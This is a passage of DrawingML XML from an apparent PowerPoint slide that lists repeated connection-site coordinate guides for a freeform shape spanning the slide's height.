              <a:gd name="connsiteY62" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 274896 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY95" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY96" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY97" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY98" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144438 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 156016 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251160 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255587 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 323969 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 348400 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 385283 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 423664 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 453239 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 504159 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 283394 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 274896 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY95" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY96" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY97" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144438 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 156016 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251160 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255587 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 323969 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 348400 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 385283 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 423664 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 504159 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 283394 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 274896 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 1168288 h 6858000"/>
